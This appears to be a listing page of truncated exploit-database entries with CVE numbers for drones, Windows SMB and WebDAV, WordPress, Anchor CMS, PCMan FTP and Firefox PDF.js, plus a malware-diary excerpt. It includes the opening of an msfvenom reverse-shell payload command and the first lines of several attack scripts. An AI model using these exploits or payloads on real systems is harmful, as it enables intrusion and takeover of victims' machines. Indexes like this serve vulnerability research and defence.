#!/usr/bin/env python3 # Exploit Title: Parrot and DJI variants Drone OSes – Kernel Panic Exploit # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-10 # Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M # CVE: CVE-2025-37928 # Type: Local Privilege Escalation / Kernel Panic # Platform: Linux-based drone…
#!/usr/bin/env python3 # Exploit Title: Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE) # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-13 # Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2 # CVE: CVE-2025-33073 # Type: Remote # Platform: Microsoft Windows (including…
# Exploit Title: Anchor CMS 0.12.7 – Stored Cross Site Scripting (XSS) # Google Dork: inurl:”/admin/pages/add” “Anchor CMS” # Date: 2025-06-08 # Exploit Author: /bin/neko # Vendor Homepage: http://anchorcms.com # Software Link: https://github.com/anchorcms/anchor-cms # Version: 0.12.7 # Tested on: Ubuntu 22.04 + Apache2 + PHP 8.1 # CVE: CVE-2025-46041 # Description: Anchor CMS v0.12.7…
# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 – Privilege Escalation # Date: 2025-06-10 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Country: United Kingdom # CVE : CVE-2024-28000 import requests import random import string import concurrent.futures # Configuration target_url = ‘http://example.com’ rest_api_endpoint = ‘/wp-json/wp/v2/users’ ajax_endpoint =…
Exploit Title: WebDAV Windows 10 – Remote Code Execution (RCE) Date: June 2025 Author: Dev Bui Hieu Tested on: Windows 10, Windows 11 Platform: Windows Type: Remote CVE: CVE-2025-33053 Description: This exploit leverages the behavior of Windows .URL files to execute a remote binary over a UNC path. When a victim opens or previews…
# Exploit Title: PCMan FTP Server 2.0.7 – Buffer Overflow # Date: 04/17/2025 # Exploit Author: Fernando Mengali # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0.7 # Tested on: Windows XP SP3 – # Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2) # CVE: CVE-2025-4255 # msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444 …
# Exploit Title: Microsoft Windows 11 – Kernel Privilege Escalation # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Tested on: Win, Ubuntu # CVE : CVE-2024-21338 #include “pch.hpp” #include “poc.hpp” // This function is used to set the IOCTL buffer depending on the…
# Exploit Title: WordPress Core 6.2 – Directory Traversal # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Version: = 6.2 # Tested on: Win, Ubuntu # CVE : CVE-2023-2745 import requests from colorama import init, Fore, Style init(autoreset=True) url = input(“E.G https://example.com/wp-login.php : “) …
I spotted another interesting file that uses, once again, steganography. It seems to be a trend (see one of my previous diaries[1]). The file is an malicious Excel sheet called blcopy.xls. Office documents are rare these days because Microsoft improved the rules to allow automatic macro execution[2]. But it does not mean that Office documents…
# Exploit Title: Firefox ESR 115.11 – Arbitrary JavaScript execution in PDF.js # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://wordpress.org # Version: = 115.11 # Tested on: Win, Ubuntu # CVE : CVE-2024-4367 #!/usr/bin/env python3 import sys def…
